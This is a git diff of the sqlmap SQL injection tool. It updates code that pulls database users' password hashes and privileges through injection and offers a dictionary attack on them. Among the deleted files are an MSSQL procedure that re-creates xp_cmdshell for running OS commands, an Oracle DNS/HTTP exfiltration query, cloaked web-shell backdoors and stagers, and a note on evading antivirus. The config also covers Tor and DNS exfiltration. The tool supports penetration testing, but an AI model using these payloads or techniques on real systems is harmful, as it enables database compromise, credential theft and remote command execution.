"hashes for user '%s'" % user - logger.warn(warnMsg) - continue + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + + if not isNumPosStrValue(count): + if Backend.isDbms(DBMS.MSSQL): + fallback = True + count = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + elif Backend.isDbms(DBMS.MYSQL): + fallback = True + count = inject.getValue(query.replace("authentication_string", "password"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + + if not isNumPosStrValue(count): + warnMsg = "unable to retrieve the number of password " + warnMsg += "hashes for user '%s'" % user + logger.warning(warnMsg) + continue infoMsg = "fetching password hashes for user '%s'" % user logger.info(infoMsg) passwords = [] - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) + plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: @@ -274,11 +320,26 @@ def getPasswordHashes(self): query = rootQuery.blind.query2 % (user, index, user) else: query = rootQuery.blind.query % (user, index, user) + + if fallback: + query = query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr") + + elif Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO): + query = rootQuery.blind.query % (user,) + + elif Backend.isDbms(DBMS.HSQLDB): + query = rootQuery.blind.query % (index, user) + else: query = rootQuery.blind.query % (user, index) + if Backend.isDbms(DBMS.MYSQL): + if fallback: + query = query.replace("authentication_string", "password") + password = unArrayizeValue(inject.getValue(query, union=False, error=False)) password = parsePasswordHash(password) + passwords.append(password) if passwords: @@ -286,32 +347,30 @@ def getPasswordHashes(self): else: warnMsg = "unable to retrieve the password " warnMsg += "hashes for user '%s'" % user - logger.warn(warnMsg) + logger.warning(warnMsg) retrievedUsers.add(user) if not kb.data.cachedUsersPasswords: errMsg = "unable to retrieve the password hashes for the " - errMsg += "database users (most probably because the session " - errMsg += "user has no read privileges over the relevant " - errMsg += "system database table)" - raise SqlmapNoneDataException(errMsg) + errMsg += "database users" + logger.error(errMsg) else: for user in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = list(set(kb.data.cachedUsersPasswords[user])) - storeHashesToFile(kb.data.cachedUsersPasswords) + storeHashesToFile(kb.data.cachedUsersPasswords) - message = "do you want to perform a dictionary-based attack " - message += "against retrieved password hashes? [Y/n/q]" - test = readInput(message, default="Y") + message = "do you want to perform a dictionary-based attack " + message += "against retrieved password hashes? [Y/n/q]" + choice = readInput(message, default='Y').upper() - if test[0] in ("n", "N"): - pass - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - attackCachedUsersPasswords() + if choice == 'N': + pass + elif choice == 'Q': + raise SqlmapUserQuitException + else: + attackCachedUsersPasswords() return kb.data.cachedUsersPasswords @@ -320,7 +379,7 @@ def getPrivileges(self, query2=False): rootQuery = queries[Backend.getIdentifiedDbms()].privileges - if conf.user == "CU": + if conf.user == CURRENT_USER: infoMsg += " for current user" conf.user = self.getCurrentUser() @@ -330,18 +389,18 @@ def getPrivileges(self, query2=False): conf.user = conf.user.upper() if conf.user: - users = conf.user.split(",") + users = conf.user.split(',') if Backend.isDbms(DBMS.MYSQL): for user in users: - parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) + parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user) if parsedUser: users[users.index(user)] = parsedUser.groups()[0] else: users = [] - users = filter(None, users) + users = [_ for _ in users if _] # Set containing the list of DBMS administrators areAdmins = set() @@ -368,7 +427,7 @@ def getPrivileges(self, query2=False): values = inject.getValue(query, blind=False, time=False) if not values and Backend.isDbms(DBMS.ORACLE) and not query2: - infoMsg = "trying with table USER_SYS_PRIVS" + infoMsg = "trying with table 'USER_SYS_PRIVS'" logger.info(infoMsg) return self.getPrivileges(query2=True) @@ -378,7 +437,7 @@ def getPrivileges(self, query2=False): user = None privileges = set() - for count in xrange(0, len(value)): + for count in xrange(0, len(value or [])): # The first column is always the username if count == 0: user = value[count] @@ -387,43 +446,48 @@ def getPrivileges(self, query2=False): else: privilege = value[count] + if privilege is None: + continue + # In PostgreSQL we get 1 if the privilege is # True, 0 otherwise if Backend.isDbms(DBMS.PGSQL) and getUnicode(privilege).isdigit(): - if int(privilege) == 1: + if int(privilege) == 1 and count in PGSQL_PRIVS: privileges.add(PGSQL_PRIVS[count]) # In MySQL >= 5.0 and Oracle we get the list # of privileges as string - elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema): + elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema) or Backend.getIdentifiedDbms() in (DBMS.VERTICA, DBMS.MIMERSQL, DBMS.CUBRID, DBMS.SNOWFLAKE): privileges.add(privilege) # In MySQL < 5.0 we get Y if the privilege is # True, N otherwise elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - if privilege.upper() == "Y": + if privilege.upper() == 'Y': privileges.add(MYSQL_PRIVS[count]) # In Firebird we get one letter for each privilege elif Backend.isDbms(DBMS.FIREBIRD): - privileges.add(FIREBIRD_PRIVS[privilege.strip()]) + if privilege.strip() in FIREBIRD_PRIVS: + privileges.add(FIREBIRD_PRIVS[privilege.strip()]) # In DB2 we get Y or G if the privilege is # True, N otherwise elif Backend.isDbms(DBMS.DB2): - privs = privilege.split(",") + privs = privilege.split(',') privilege = privs[0] - privs = privs[1] - privs = list(privs.strip()) - i = 1 + if len(privs) > 1: + privs = privs[1] + privs = list(privs.strip()) + i = 1 - for priv in privs: - if priv.upper() in ("Y", "G"): - for position, db2Priv in DB2_PRIVS.items(): - if position == i: - privilege += ", " + db2Priv + for priv in privs: + if priv.upper() in ('Y', 'G'): + for position, db2Priv in DB2_PRIVS.items(): + if position == i: + privilege += ", " + db2Priv - i += 1 + i += 1 privileges.add(privilege) @@ -434,7 +498,7 @@ def getPrivileges(self, query2=False): if not kb.data.cachedUsersPrivileges and isInferenceAvailable() and not conf.direct: if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: - conditionChar = " LIKE " + conditionChar = "LIKE" else: conditionChar = "=" @@ -443,7 +507,7 @@ def getPrivileges(self, query2=False): if Backend.isDbms(DBMS.MYSQL): for user in users: - parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) + parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user) if parsedUser: users[users.index(user)] = parsedUser.groups()[0] @@ -458,39 +522,42 @@ def getPrivileges(self, query2=False): if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: user = "%%%s%%" % user - infoMsg = "fetching number of privileges " - infoMsg += "for user '%s'" % outuser - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.blind.count2 % user - elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: - query = rootQuery.blind.count % (conditionChar, user) - elif Backend.isDbms(DBMS.ORACLE) and query2: - query = rootQuery.blind.count2 % user + if Backend.isDbms(DBMS.INFORMIX): + count = 1 else: - query = rootQuery.blind.count % user + infoMsg = "fetching number of privileges " + infoMsg += "for user '%s'" % outuser + logger.info(infoMsg) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: + query = rootQuery.blind.count2 % user + elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: + query = rootQuery.blind.count % (conditionChar, user) + elif Backend.isDbms(DBMS.ORACLE) and query2: + query = rootQuery.blind.count2 % user + else: + query = rootQuery.blind.count % user - if not isNumPosStrValue(count): - if Backend.isDbms(DBMS.ORACLE) and not query2: - infoMsg = "trying with table USER_SYS_PRIVS" - logger.info(infoMsg) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - return self.getPrivileges(query2=True) + if not isNumPosStrValue(count): + if not retrievedUsers and Backend.isDbms(DBMS.ORACLE) and not query2: + infoMsg = "trying with table 'USER_SYS_PRIVS'" + logger.info(infoMsg) - warnMsg = "unable to retrieve the number of " - warnMsg += "privileges for user '%s'" % outuser - logger.warn(warnMsg) - continue + return self.getPrivileges(query2=True) + + warnMsg = "unable to retrieve the number of " + warnMsg += "privileges for user '%s'" % outuser + logger.warning(warnMsg) + continue infoMsg = "fetching privileges for user '%s'" % outuser logger.info(infoMsg) privileges = set() - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) + plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: @@ -502,39 +569,43 @@ def getPrivileges(self, query2=False): query = rootQuery.blind.query2 % (user, index) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query % (index, user) + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.query % (user,) else: query = rootQuery.blind.query % (user, index) + privilege = unArrayizeValue(inject.getValue(query, union=False, error=False)) + if privilege is None: + continue + # In PostgreSQL we get 1 if the privilege is True, # 0 otherwise if Backend.isDbms(DBMS.PGSQL) and ", " in privilege: - privilege = privilege.replace(", ", ",") - privs = privilege.split(",") + privilege = privilege.replace(", ", ',') + privs = privilege.split(',') i = 1 for priv in privs: - if priv.isdigit() and int(priv) == 1: - for position, pgsqlPriv in PGSQL_PRIVS.items(): - if position == i: - privileges.add(pgsqlPriv) + if priv.isdigit() and int(priv) == 1 and i in PGSQL_PRIVS: + privileges.add(PGSQL_PRIVS[i]) i += 1 # In MySQL >= 5.0 and Oracle we get the list # of privileges as string - elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema): + elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema) or Backend.getIdentifiedDbms() in (DBMS.VERTICA, DBMS.MIMERSQL, DBMS.CUBRID): privileges.add(privilege) # In MySQL < 5.0 we get Y if the privilege is # True, N otherwise elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - privilege = privilege.replace(", ", ",") - privs = privilege.split(",") + privilege = privilege.replace(", ", ',') + privs = privilege.split(',') i = 1 for priv in privs: - if priv.upper() == "Y": + if priv.upper() == 'Y': for position, mysqlPriv in MYSQL_PRIVS.items(): if position == i: privileges.add(mysqlPriv) @@ -543,19 +614,25 @@ def getPrivileges(self, query2=False): # In Firebird we get one letter for each privilege elif Backend.isDbms(DBMS.FIREBIRD): - privileges.add(FIREBIRD_PRIVS[privilege.strip()]) + if privilege.strip() in FIREBIRD_PRIVS: + privileges.add(FIREBIRD_PRIVS[privilege.strip()]) + + # In Informix we get one letter for the highest privilege + elif Backend.isDbms(DBMS.INFORMIX): + if privilege.strip() in INFORMIX_PRIVS: + privileges.add(INFORMIX_PRIVS[privilege.strip()]) # In DB2 we get Y or G if the privilege is # True, N otherwise elif Backend.isDbms(DBMS.DB2): - privs = privilege.split(",") + privs = privilege.split(',') privilege = privs[0] privs = privs[1] privs = list(privs.strip()) i = 1 for priv in privs: - if priv.upper() in ("Y", "G"): + if priv.upper() in ('Y', 'G'): for position, db2Priv in DB2_PRIVS.items(): if position == i: privilege += ", " + db2Priv @@ -575,7 +652,7 @@ def getPrivileges(self, query2=False): else: warnMsg = "unable to retrieve the privileges " warnMsg += "for user '%s'" % outuser - logger.warn(warnMsg) + logger.warning(warnMsg) retrievedUsers.add(user) @@ -593,6 +670,6 @@ def getPrivileges(self, query2=False): def getRoles(self, query2=False): warnMsg = "on %s the concept of roles does not " % Backend.getIdentifiedDbms() warnMsg += "exist. sqlmap will enumerate privileges instead" - logger.warn(warnMsg) + logger.warning(warnMsg) return self.getPrivileges(query2) diff --git a/procs/mssqlserver/create_new_xp_cmdshell.sql b/procs/mssqlserver/create_new_xp_cmdshell.sql deleted file mode 100644 index 913f368c1c1..00000000000 --- a/procs/mssqlserver/create_new_xp_cmdshell.sql +++ /dev/null @@ -1,3 +0,0 @@ -DECLARE @%RANDSTR% nvarchar(999); -set @%RANDSTR%='CREATE PROCEDURE %XP_CMDSHELL_NEW%(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'',@ID OUT EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 EXEC sp_OADestroy @ID'; -EXEC master..sp_executesql @%RANDSTR% diff --git a/procs/oracle/dns_request.sql b/procs/oracle/dns_request.sql deleted file mode 100644 index adb71cfb2fb..00000000000 --- a/procs/oracle/dns_request.sql +++ /dev/null @@ -1,2 +0,0 @@ -SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL -# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL diff --git a/shell/README.txt b/shell/README.txt deleted file mode 100644 index 6e2e08cfc74..00000000000 --- a/shell/README.txt +++ /dev/null @@ -1,11 +0,0 @@ -Due to the anti-virus positive detection of shell scripts stored inside -this folder, we needed to somehow circumvent this. As from the plain -sqlmap users perspective nothing has to be done prior to their usage by -sqlmap, but if you want to have access to their original source code use -the decrypt functionality of the ../extra/cloak/cloak.py utility. - -To prepare the original scripts to the cloaked form use this command: -find backdoor.* stager.* -type f -exec python ../extra/cloak/cloak.py -i '{}' \; - -To get back them into the original form use this: -find backdoor.*_ stager.*_ -type f -exec python ../extra/cloak/cloak.py -d -i '{}' \; diff --git a/shell/backdoor.asp_ b/shell/backdoor.asp_ deleted file mode 100644 index 720f13de61b..00000000000 Binary files a/shell/backdoor.asp_ and /dev/null differ diff --git a/shell/backdoor.aspx_ b/shell/backdoor.aspx_ deleted file mode 100644 index 178c1185ae5..00000000000 --- a/shell/backdoor.aspx_ +++ /dev/null @@ -1,2 +0,0 @@ -=%FN>&Y,&LîÎ߀;o€pZþŠ¿÷ÿê?~½¸ë´èYÕpWaV¡“Y€eyƒ?ÔÐvI¡µrrB2y€eK96¦£9š~ˆ|?evWu2êO.´†<_Krr” }‚ü]àcɘÚÔgÆCk:~·¤ëÃÓpßÍ~³ ¼g£b®ø2 \_ Œ“=éZî˜_¬…{1N)×`VYÓ–r¡¦M)ƒ› ¾/–3tœý\7<Iu5ñ(°F¶w'6à’ ƒ i“v* \,„ÐÔæ9ÕéÁm{2qݰ†¢2<V/cõ1\~b—u1?G׆â7 ønê/ “„á“f4#d>gn¬Þ;~Š^˜\6¡/{m]ø°¯ ˆiµñÒv°:õ¹TÛ Xï˜àˆcÄú_>/q’«2–Öð/]Û/戥öÖŠñ[znA‚ûo\™Á^^ë¤o”r>¤Å$¬O<ÍK¨‘ÖxöºçrB7«9L-Ja$UFsɬ˜—d\‰£ :Åë8NW˜çd --¦›ZùJÌgsáv=„*í?Cž•'#‹sÊÉŒ=\o>ÀVa×5[ †ÈÈŒÊ$ᜠå£pñ[,…vyóAìà \ No newline at end of file diff --git a/shell/backdoor.jsp_ b/shell/backdoor.jsp_ deleted file mode 100644 index 60f80dabff1..00000000000 --- a/shell/backdoor.jsp_ +++ /dev/null @@ -1,2 +0,0 @@ -=%FN>&Y,&Ä–‰ €;o  p-[ØŠ@÷ÿê?~½›. 5ž¢f|0,?Ñ ~¡l6´Ê Ó>£_err|ÐfKe~[6¤Ñêž§„KžšrKÐr”‚:92<|“™Nf r¨˜ ‹DX VsÂ;w…0mxÖH†÷¶ß7e·~>ƒê0XW‰f«’ÙefÄ(Ž~V0kmCì*‚fŽ€nÉ5æ3S¿˜\iƒ:ƒO攓lÒÍw„¯X±©Ô ®ß1©”„²ÇáE_¸¤J&Æ><{Ÿr…zâ™4€õÞ?´‹sã™=Kà€×¨^îmݬòÏÖ?‚v¤Þ_ùÏ}«A4 ¹Ù‹n/sU‰Ç3I; 7‰‚u@?ìbÁ¯+¢#ÂͼÄýÐk{áè³à¬óTQÇIC<êÒµ Û'ÃdmŒÌl<zY|qhoOÐ;^Ag±=U³×w';×8E}‚fg9:;4‚^¡Âà%¹Sùš“œÝºoZjtë ˆhÚ6Ñ3è -~CÁˆnË_™eyt³Šò(7©Wà›|ü"Éká==Hm&À \ No newline at end of file diff --git a/shell/backdoor.php_ b/shell/backdoor.php_ deleted file mode 100644 index 7953ba9ce87..00000000000 --- a/shell/backdoor.php_ +++ /dev/null @@ -1,4 +0,0 @@ -=%FN>&Y,&I£TyŽŸ€ -íòpÂzAq¿÷Þú?}gÖí•za¡ég\2~£<<õ?”,l_ž¦Ê?g\KeÓ3oZKš,Ä<ÔõrfKNrrx¨É£v[Œ9ŠKÛWžWNd¾WÅ -oõÆ®¹Œ£vJ7;ð¢3 m5}˜„TIgûÔB—æ<h¹EU]Žuå^Ô‘’m[_Ž’•SÎß×ðîsoúJ,%)@Vc=ðç­/¾Ç°ÀøkáÀˆª‘Í>*ˆåx'×g¨.9ßp A—»5rLS|eR1¶Yè1†E+(h2M)ÁŠ…²I]5 Ƹ×?¾ˆ&#«ºÑoí*{äë•HïáÈžÑä<;ßTsÑö÷Gö!è˜ÑÖ˜85,-Æ?_éü–Õ>-¹ï»Æ²Öʼn’¬c4⹬WëÖð ’bkD’¡²ÐÒ+i'Ü¢xƒ󓞆©Ròz–Ë[š3s‰6k Ý]C_Bêõ5ž¾TÔ -bzs8G¼¬w´L®µ#ôî¨[@RB9¸¨.‡•¨®@ ‘Z^â—c»óµYvU°³‘V˜T¶Å|ä|K:ýƒ[Nê–¨:i_ZÞC/… FÝ6îkÝh“]¹Ñˆð¥93T$È1Ò†l•ºäRcÎ9h‰¬+HäŽñìsÈŽ3‘þQ䊡_9)s \ No newline at end of file diff --git a/shell/runcmd.exe_ b/shell/runcmd.exe_ deleted file mode 100644 index 109987ea1ed..00000000000 Binary files a/shell/runcmd.exe_ and /dev/null differ diff --git a/shell/stager.asp_ b/shell/stager.asp_ deleted file mode 100644 index 377109575fe..00000000000 Binary files a/shell/stager.asp_ and /dev/null differ diff --git a/shell/stager.aspx_ b/shell/stager.aspx_ deleted file mode 100644 index d160e68fbd8..00000000000 Binary files a/shell/stager.aspx_ and /dev/null differ diff --git a/shell/stager.jsp_ b/shell/stager.jsp_ deleted file mode 100644 index 730a13751a7..00000000000 Binary files a/shell/stager.jsp_ and /dev/null differ diff --git a/shell/stager.php_ b/shell/stager.php_ deleted file mode 100644 index 763e892d115..00000000000 --- a/shell/stager.php_ +++ /dev/null @@ -1,2 +0,0 @@ -=%FN>&Y,&¢$§6 €}o+çæŸ÷ÿÚ¿ÿO~Š%Ù‚.],Ê”òp-\>¦?a£vúWr~V¢¦lÑL7Ñ£?y€Kv6YšY†9€y‡AËr„0‡¹ Á®·åPoVš':(9K,æ¶Kì-*tƒk7+n¦feÛ×4T rñÏRÚ›iݯ…²yæ)ZkRH”’ü'X§©¿¼:ÕŠ¥g²ª9£ÌP[,;EëªCÖ7Û]öJïLצ×iî¤'?ÚˆÔUö¬Ð†É¦Üd(³Ž†¥êJ0FÉ#K?íêâo*K‰oetÔÛW˜GÄ>ÆXŠìñ_-™¨R›Oò?NŠ-ùß8‡3Ї -/™Ï¸*óPÆÓGÒlháTg1£~ñ£+é¨(SŽ—tXE$Êf˨8)^Ÿ‰I|y»ûôªvÂp¶i‡¸_;7æ '^‰T¤3~$dƒÅ8R‘rƒP|Ý?<\:K6Y|"oå9‚zà"(Å¡F/ueTX'ýZŽ·þ ¦Œô%,i‰jÌØ®Éu‚×{Öp*ìŒ]áþQ䊡^;ø·1 \ No newline at end of file diff --git a/sqlmap.conf b/sqlmap.conf index a4529089f44..9d0ca92db03 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -1,113 +1,161 @@ # At least one of these options has to be specified to set the source to -# get target urls from. +# get target URLs from. [Target] +# Target URL. +# Example: http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2 +url = + # Direct connection to the database. # Examples: # mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME # oracle://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_SID direct = -# Target URL. -# Example: http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2 -url = - # Parse targets from Burp or WebScarab logs # Valid: Burp proxy (http://portswigger.net/suite/) requests log file path # or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) # 'conversations/' folder path logFile = +# Scan multiple targets enlisted in a given textual file +bulkFile = + # Load HTTP request from a file # Example (file content): POST /login.jsp HTTP/1.1\nHost: example.com\nUser-Agent: Mozilla/4.0\n\nuserid=joe&password=guessme requestFile = -# Load session from a stored (.sqlite) file -# Example: output/www.target.com/session.sqlite -sessionFile = - -# Rather than providing a target url, let Google return target +# Rather than providing a target URL, let Google return target # hosts as result of your Google dork expression. For a list of Google -# dorks see Johnny Long Google Hacking Database at -# http://johnny.ihackstuff.com/ghdb.php. +# dorks see Google Hacking Database at +# https://www.exploit-db.com/google-hacking-database # Example: +ext:php +inurl:"&id=" +intext:"powered by " googleDork = -# These options can be used to specify how to connect to the target url. +# These options can be used to specify how to connect to the target URL. [Request] -# Data string to be sent through POST. +# Force usage of given HTTP method (e.g. PUT). +method = + +# Data string to be sent through POST (e.g. "id=1"). data = -# Character used for splitting cookie values -pDel = +# Character used for splitting parameter values (e.g. &). +paramDel = -# HTTP Cookie header. +# HTTP Cookie header value (e.g. "PHPSESSID=a8d127e.."). cookie = -# File containing cookies in Netscape/wget format +# Character used for splitting cookie values (e.g. ;). +cookieDel = + +# Live cookies file used for loading up-to-date values. +liveCookies = + +# File containing cookies in Netscape/wget format. loadCookies = -# Ignore Set-Cookie header from response +# Ignore Set-Cookie header from response. # Valid: True or False dropSetCookie = False -# HTTP User-Agent header. Useful to fake the HTTP User-Agent header value -# at each HTTP request +# Use HTTP version 1.0 (old). +# Valid: True or False +http10 = False + +# Use HTTP version 2 (experimental). +# Valid: True or False +http2 = False + +# HTTP User-Agent header value. Useful to fake the HTTP User-Agent header value +# at each HTTP request. # sqlmap will also test for SQL injection on the HTTP User-Agent value. agent = -# Use randomly selected HTTP User-Agent header +# Imitate smartphone through HTTP User-Agent header. +# Valid: True or False +mobile = False + +# Use randomly selected HTTP User-Agent header value. # Valid: True or False randomAgent = False -# HTTP Host header. +# HTTP Host header value. host = # HTTP Referer header. Useful to fake the HTTP Referer header value at # each HTTP request. referer = -# Randomly change value for the given parameter -rParam = - -# Force usage of SSL/HTTPS requests -# Valid: True or False -forceSSL = False - # Extra HTTP headers headers = Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 -# HTTP Authentication type. Useful only if the target url requires -# HTTP Basic, Digest or NTLM authentication and you have such data. -# Valid: Basic, Digest or NTLM -aType = +# HTTP Authentication type. Useful only if the target URL requires +# HTTP Basic, Digest, Bearer or NTLM authentication and you have such data. +# Valid: Basic, Digest, Bearer, NTLM or PKI +authType = -# HTTP authentication credentials. Useful only if the target url requires -# HTTP Basic, Digest or NTLM authentication and you have such data. +# HTTP authentication credentials. Useful only if the target URL requires +# HTTP Basic, Digest, Token or NTLM authentication and you have such data. # Syntax: username:password -aCred = +authCred = + +# HTTP Authentication PEM private/cert key file. Useful only if the target URL requires +# PKI authentication and you have such data. +# Syntax: key_file +authFile = + +# Abort on (problematic) HTTP error code (e.g. 401). +# Valid: string +abortCode = + +# Ignore (problematic) HTTP error code (e.g. 401). +# Valid: string +ignoreCode = + +# Ignore system default proxy settings. +# Valid: True or False +ignoreProxy = False + +# Ignore redirection attempts. +# Valid: True or False +ignoreRedirects = False -# HTTP Authentication certificate. Useful only if the target url requires -# logon certificate and you have such data. -# Syntax: key_file,cert_file -aCert = +# Ignore connection timeouts. +# Valid: True or False +ignoreTimeouts = False -# Use a HTTP proxy to connect to the target url. -# Syntax: http://address:port +# Use a proxy to connect to the target URL. +# Syntax: (http|https|socks4|socks5)://address:port proxy = -# HTTP proxy authentication credentials. Useful only if the proxy requires -# HTTP Basic or Digest authentication and you have such data. +# Proxy authentication credentials. Useful only if the proxy requires +# Basic or Digest authentication and you have such data. # Syntax: username:password -pCred = +proxyCred = + +# Load proxy list from a file +proxyFile = -# Ignore system default HTTP proxy. +# Use Tor anonymity network. # Valid: True or False -ignoreProxy = False +tor = False + +# Set Tor proxy port other than default. +# Valid: integer +# torPort = + +# Set Tor proxy type. +# Valid: HTTP, SOCKS4, SOCKS5 +torType = SOCKS5 + +# Check to see if Tor is used properly. +# Valid: True or False +checkTor = False # Delay in seconds between each HTTP request. # Valid: float @@ -124,29 +172,63 @@ timeout = 30 # Default: 3 retries = 3 -# Regular expression for filtering targets from provided Burp. -# or WebScarab proxy log. -# Example: (google|yahoo) -scope = +# Retry request on regexp matching content. +retryOn = + +# Randomly change value for the given parameter. +rParam = -# Url address to visit frequently during testing. +# URL address to visit frequently during testing. # Example: http://192.168.1.121/index.html -safUrl = +safeUrl = -# Test requests between two visits to a given safe url (default 0). +# POST data to send to a safe URL. +# Example: username=admin&password=passw0rd! +safePost = + +# Load safe HTTP request from a file. +safeReqFile = + +# Regular requests between visits to a safe URL (default 0). # Valid: integer # Default: 0 -saFreq = 0 +safeFreq = 0 -# Skip URL encoding of payload data +# Skip URL encoding of payload data. # Valid: True or False skipUrlEncode = False +# Parameter used to hold anti-CSRF token. +csrfToken = + +# URL address to visit to extract anti-CSRF token +csrfUrl = + +# HTTP method to use during anti-CSRF token page visit. +csrfMethod = + +# POST data to send during anti-CSRF token page visit. +csrfData = + +# Retries for anti-CSRF token retrieval. +csrfRetries = + +# Force usage of SSL/HTTPS +# Valid: True or False +forceSSL = False + +# Use HTTP chunked transfer encoded requests. +# Valid: True or False +chunked = False + +# Use HTTP parameter pollution. +# Valid: True or False +hpp = False + # Evaluate provided Python code before the request. # Example: import hashlib;id2=hashlib.md5(id).hexdigest() evalCode = - # These options can be used to optimize the performance of sqlmap. [Optimization] @@ -180,14 +262,35 @@ threads = 1 # parameters and HTTP User-Agent are tested by sqlmap. testParameter = -# Force back-end DBMS to this value. If this option is set, the back-end +# Skip testing for given parameter(s). +skip = + +# Skip testing parameters that not appear to be dynamic. +# Valid: True or False +skipStatic = False + +# Regexp to exclude parameters from testing (e.g. "ses"). +paramExclude = + +# Select testable parameter(s) by place (e.g. "POST"). +paramFilter = + +# Force back-end DBMS to provided value. If this option is set, the back-end # DBMS identification process will be minimized as needed. # If not set, sqlmap will detect back-end DBMS automatically by default. # Valid: mssql, mysql, mysql 4, mysql 5, oracle, pgsql, sqlite, sqlite3, # access, firebird, maxdb, sybase dbms = -# Force back-end DBMS operating system to this value. If this option is +# DBMS authentication credentials (user:password). Useful if you want to +# run SQL statements as another user, the back-end database management +# system is PostgreSQL or Microsoft SQL Server and the parameter is +# vulnerable by stacked queries SQL injection or you are connecting directly +# to the DBMS (-d switch). +# Syntax: username:password +dbmsCred = + +# Force back-end DBMS operating system to provided value. If this option is # set, the back-end DBMS identification process will be minimized as # needed. # If not set, sqlmap will detect back-end DBMS operating system @@ -203,6 +306,10 @@ invalidBignum = False # Valid: True or False invalidLogical = False +# Use random strings for invalidating values. +# Valid: True or False +invalidString = False + # Turn off payload casting mechanism # Valid: True or False noCast = False @@ -217,9 +324,6 @@ prefix = # Injection payload suffix string. suffix = -# Skip testing for given parameter(s). -skip = - # Use given script(s) for tampering injection data. tamper = @@ -238,7 +342,7 @@ level = 1 # Risk of tests to perform. # Note: boolean-based blind SQL injection tests with AND are considered # risk 1, with OR are considered risk 3. -# Valid: Integer between 0 and 3 +# Valid: Integer between 1 and 3 # Default: 1 risk = 1 @@ -266,6 +370,10 @@ regexp = # code) # code = +# Conduct thorough tests only if positive heuristic(s). +# Valid: True or False +smart = False + # Compare pages based only on the textual content. # Valid: True or False textOnly = False @@ -279,40 +387,59 @@ titles = False # techniques. [Techniques] -# SQL injection techniques to test for. -# Valid: a string composed by B, E, U, S and T where: +# SQL injection techniques to use. +# Valid: a string composed by B, E, U, S, T and Q where: # B: Boolean-based blind SQL injection # E: Error-based SQL injection # U: UNION query SQL injection # S: Stacked queries SQL injection # T: Time-based blind SQL injection +# Q: Inline SQL injection # Example: ES (means test for error-based and stacked queries SQL # injection types only) # Default: BEUSTQ (means test for all SQL injection types - recommended) -tech = BEUSTQ +technique = BEUSTQ # Seconds to delay the response from the DBMS. # Valid: integer # Default: 5 timeSec = 5 -# Range of columns to test for +# Disable the statistical model for detecting the delay. +# Valid: True or False +disableStats = False + +# Range of columns to test for. # Valid: range of integers # Example: 1-10 uCols = -# Character to use for bruteforcing number of columns +# Character to use for bruteforcing number of columns. # Valid: string # Example: NULL uChar = -# Domain name used for DNS exfiltration attack +# Table to use in FROM part of UNION query SQL injection. +# Valid: string +# Example: INFORMATION_SCHEMA.COLLATIONS +uFrom = + +# Column values to use for UNION query SQL injection. +# Valid: string +# Example: NULL,1,*,NULL +uValues = + +# Domain name used for DNS exfiltration attack. +# Valid: string +dnsDomain = + +# Resulting page URL searched for second-order response. # Valid: string -dnsName = +secondUrl = -# Resulting page url searched for second-order response +# Load second-order HTTP request from file. # Valid: string -secondOrder = +secondReq = [Fingerprint] @@ -405,15 +532,32 @@ dumpAll = False # Valid: True or False search = False +# Check for database management system database comments during enumeration. +# Valid: True or False +getComments = False + +# Retrieve SQL statements being run on database management system. +# Valid: True or False +getStatements = False + # Back-end database management system database to enumerate. db = 